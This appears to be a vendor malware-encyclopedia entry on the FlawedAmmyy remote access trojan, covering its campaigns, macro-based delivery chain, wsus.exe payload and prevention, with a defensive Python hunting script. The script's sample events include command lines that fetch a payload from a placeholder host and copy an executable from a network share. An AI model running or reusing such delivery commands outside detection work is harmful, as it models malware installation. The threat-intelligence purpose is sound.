
FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Type: Trojan
Origin: Unknown
First seen: 1 January, 2016
Last seen: 31 October, 2020


IOCs


What is FlawedAmmyy malware?

FlawedAmmyy is a Remote Access Trojan – malware that attackers use to take full control of a target machine. It is based on the source code of Ammyy Admin, a completely legitimate remote administration program. Although this RAT was first recorded as new malware in 2018, some researchers suggest that it has been in use since 2016.

FlawedAmmyy has been used by multiple attackers both in massive email-spam campaigns and in highly targeted cyber attacks aimed at businesses in the automotive industry. Among others, a well-known threat actor operating under the alias TA505 is known to have used this malware in large-scale campaigns.

General description of FlawedAmmyy malware

Built from the leaked source code of the third version of Ammyy Admin – a legitimate remote access and administration program – FlawedAmmyy enables attackers to perform multiple actions on infected Windows PCs. With this malware, attackers can control the desktop remotely, manipulate files, steal credentials, and access audio on an infected machine to potentially collect information about their victims.

The popularity of FlawedAmmyy started rising especially quickly in 2018, as the focus of malicious actors shifted from operating ransomware to other types of malicious programs. In particular, in November 2018, a threat actor known as TA505 started distributing various loaders in their spam email campaigns – using ServHelper at first and later switching to AndroMut – with the end goal of infecting victims with FlawedAmmyy.

Researchers have detected two separate campaigns that distributed FlawedAmmyy using the AndroMut loader. The first targeted victims in South Korea with HTML attachments designed to download an Office file with malicious macros; the macros installed a loader, which in turn dropped the main payload, the FlawedAmmyy RAT. The scope of other campaigns featuring AndroMut was broader and included enterprises in the USA, UAE, and Singapore.

Other campaigns in 2019, not necessarily run by TA505, made use of an XLM document containing a malicious macro that downloaded FlawedAmmyy directly, bypassing the loader stage.

FlawedAmmyy malware analysis

A video recorded in the ANY.RUN malware hunting service shows the execution process of FlawedAmmyy, allowing one to examine it in a convenient and safe environment.

Figure 1: Graph of processes generated by the ANY.RUN malware analysis service

Figure 2: Even more information about the execution of the malware can be found in the customizable text reports generated by ANY.RUN

FlawedAmmyy execution process

Usually, FlawedAmmyy makes its way onto the machine through mail spam in the form of an MS Word or MS Excel document with a malicious macro. Examples of such malicious documents can be found among ANY.RUN's public submissions by browsing the tag maldoc-21. After the malicious .xls file is opened, it automatically runs a macro that launches either msiexec.exe or cmd.exe to download and execute the first-stage payload. This first-stage executable then downloads and decrypts another file, usually named "wsus.exe", which is the FlawedAmmyy malware itself. Wsus.exe establishes persistence on the system and communicates with the C2 servers.

Sometimes the malicious executables are digitally signed with a certificate from a trusted vendor. It is also notable that the trojan checks the user's privileges and the presence of anti-virus programs on the infected machine and changes its behavior based on the results of this check. You can also find out how this execution method differs from Trickbot and Zloader.
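As an added example (not ANY.RUN's own code), the following Python shows how a defender could hunt for the chain described above in process-creation telemetry: an Office application spawning msiexec.exe or cmd.exe with a URL or UNC path on the command line, and a wsus.exe running outside the Windows system directories. The events are constructed samples in a Sysmon-like shape; the host names, URLs and user names are placeholders, not real indicators.

```python
import ntpath

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# Hosts, URLs and user names are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i http://example.invalid/inv.msi /q"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy \\192.0.2.10\share\in.exe %TEMP%"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\user\AppData\Roaming\wsus.exe",
     "CommandLine": r"C:\Users\user\AppData\Roaming\wsus.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r"EXCEL.EXE invoice.xls"},
]

OFFICE_APPS = {"winword.exe", "excel.exe"}
STAGE1_HOSTS = {"msiexec.exe", "cmd.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the finding labels that one process-creation event triggers."""
    findings = []
    image, parent = _name(event["Image"]), _name(event["ParentImage"])
    cmdline = event.get("CommandLine", "").lower()
    # Hop 1 of the chain: the maldoc macro launches msiexec.exe or cmd.exe.
    if parent in OFFICE_APPS and image in STAGE1_HOSTS:
        findings.append("office_spawns_stage1_host")
        # A URL or UNC path on that command line covers both the HTTP download
        # and the SMB delivery variant described for some campaigns.
        if "http://" in cmdline or "https://" in cmdline or "\\\\" in cmdline:
            findings.append("remote_payload_reference")
    # Final stage: the RAT is dropped as wsus.exe; that file name running from
    # a user-writable path rather than a system directory is worth flagging.
    if image == "wsus.exe" and not event["Image"].lower().startswith(SYSTEM_DIRS):
        findings.append("wsus_outside_system_dirs")
    return findings


def hunt(events):
    """Pair each suspicious event's Image with its findings; benign events drop out."""
    return [(e["Image"], f) for e in events if (f := classify(e))]
```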

Distribution of FlawedAmmyy RAT

FlawedAmmyy is distributed through spam email campaigns whose subjects usually concern invoices or receipts. The emails can carry a .zip attachment purporting to contain information related to the subject, a Microsoft Office file, or an XML attachment. In reality, the attached files can hold a URL that automatically opens a browser window and redirects the victim to a website from which the malware samples are downloaded.

In some campaigns, a loader designed to install the final payload is downloaded first and then drops FlawedAmmyy onto the machine. Other campaigns used the Server Message Block (SMB) protocol to download the malware directly, bypassing the browser download, which is quite a rare trick for malware.

How to prevent FlawedAmmyy attacks?

Once FlawedAmmyy infects a PC, it can operate discreetly without letting users know that their machine is in fact infected. This allows attackers to collect various information about their victims over time and makes this malware potentially very destructive.

However, adhering to simple online safety rules makes avoiding the infection fairly easy: as long as a user never clicks on suspicious links or downloads attachments from unknown senders, they will be safe. Things get a little more complicated with FlawedAmmyy, though, since some of the attacks are very targeted and feature believable emails.

Therefore, users are advised to verify the authenticity of emails themselves and pay attention to small details before downloading files or following URLs in their correspondence.

How to export FlawedAmmyy data using ANY.RUN?

Analysts can export all significant events from a task to MISP for further analysis, for export to IDS/SIEM systems, or simply to share them. Just click the "Export" button and choose "MISP JSON format" in the drop-down menu.

Figure 3: Export events from the task with FlawedAmmyy into MISP JSON

Summary

FlawedAmmyy RAT is an interesting malware that is capable of operating stealthily on infected machines and causing potentially serious damage with its remote access capabilities. It has been featured both in massive email spam campaigns and in targeted attacks against businesses in particular industries, which shows how varied the operators behind this malware can be in choosing their victims.

Security researchers only documented this malware in 2018 despite its having been around since 2016, which means that it managed to operate in the dark for two whole years, evading researchers or maybe even tricking them. Thankfully, modern malware analysis services like ANY.RUN provide multiple specially designed tools that simplify and greatly streamline the research process, helping us identify current and future threats.
